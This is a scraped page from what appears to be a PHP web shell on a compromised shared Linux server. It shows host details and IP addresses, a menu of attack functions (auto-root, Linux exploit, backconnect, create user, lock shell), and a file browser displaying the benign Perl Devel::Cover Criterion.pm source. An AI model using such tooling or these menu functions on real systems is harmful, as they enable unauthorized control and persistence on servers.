Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.34 /
Devel /
Cover /
[ HOME SHELL ]
Name
Size
Permission
Action
Annotation
[ DIR ]
drwxr-xr-x
DB
[ DIR ]
drwxr-xr-x
Report
[ DIR ]
drwxr-xr-x
Branch.pm
2.28
KB
-rw-r--r--
Collection.pm
25.29
KB
-rw-r--r--
Condition.pm
1.35
KB
-rw-r--r--
Condition_and_2.pm
1.03
KB
-rw-r--r--
Condition_and_3.pm
1.04
KB
-rw-r--r--
Condition_or_2.pm
1.02
KB
-rw-r--r--
Condition_or_3.pm
1.04
KB
-rw-r--r--
Condition_xor_4.pm
1.03
KB
-rw-r--r--
Criterion.pm
2.71
KB
-rw-r--r--
DB.pm
30.7
KB
-rw-r--r--
Dumper.pm
1.37
KB
-rw-r--r--
Html_Common.pm
884
B
-rw-r--r--
Inc.pm
1.23
KB
-rw-r--r--
Op.pm
2.91
KB
-rw-r--r--
Pod.pm
1.53
KB
-rw-r--r--
Statement.pm
1.19
KB
-rw-r--r--
Subroutine.pm
1.19
KB
-rw-r--r--
Test.pm
14.12
KB
-rw-r--r--
Time.pm
1.53
KB
-rw-r--r--
Truth_Table.pm
15.63
KB
-rw-r--r--
Tutorial.pod
5.24
KB
-rw-r--r--
Util.pm
2.1
KB
-rw-r--r--
Web.pm
28.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Criterion.pm
# Copyright 2001-2019, Paul Johnson (paul@pjcj.net) # This software is free. It is licensed under the same terms as Perl itself. # The latest version of this software should be available from my homepage: # http://www.pjcj.net package Devel::Cover::Criterion; use strict; use warnings; our $VERSION = '1.36'; # VERSION use Devel::Cover::Statement; use Devel::Cover::Branch; use Devel::Cover::Condition; use Devel::Cover::Condition_or_2; use Devel::Cover::Condition_or_3; use Devel::Cover::Condition_and_2; use Devel::Cover::Condition_and_3; use Devel::Cover::Condition_xor_4; use Devel::Cover::Subroutine; use Devel::Cover::Time; use Devel::Cover::Pod; sub coverage { $_[0][0] } sub information { $_[0][1] } sub uncoverable { "n/a" } sub covered { "n/a" } sub total { "n/a" } sub percentage { "n/a" } sub error { "n/a" } sub text { "n/a" } sub values { [ $_[0]->covered ] } sub criterion { require Carp; Carp::confess("criterion() must be overridden") } sub calculate_percentage { my $class = shift; my ($db, $s) = @_; my $errors = $s->{error} || 0; $s->{percentage} = $s->{total} ? 100 - $errors * 100 / $s->{total} : 100; } sub aggregate { my ($self, $s, $file, $keyword, $t) = @_; my $name = $self->criterion; $t = int($t); $s->{$file}{$name}{$keyword} += $t; $s->{$file}{total}{$keyword} += $t; $s->{Total}{$name}{$keyword} += $t; $s->{Total}{total}{$keyword} += $t; } sub calculate_summary { my $self = shift; my ($db, $file) = @_; my $s = $db->{summary}; $self->aggregate($s, $file, "total", $self->total); $self->aggregate($s, $file, "uncoverable", 1) if $self->uncoverable; $self->aggregate($s, $file, "covered", 1) if $self->covered; $self->aggregate($s, $file, "error", 1) if $self->error; } 1 __END__ =head1 NAME Devel::Cover::Criterion - Code coverage metrics for Perl =head1 VERSION version 1.36 =head1 SYNOPSIS use Devel::Cover::Criterion; =head1 DESCRIPTION Abstract base class for all the coverage criteria. =head1 SEE ALSO Devel::Cover =head1 METHODS =head2 new =head1 BUGS Huh? =head1 LICENCE Copyright 2001-2019, Paul Johnson (paul@pjcj.net) This software is free. It is licensed under the same terms as Perl itself. The latest version of this software should be available from my homepage: http://www.pjcj.net =cut
Close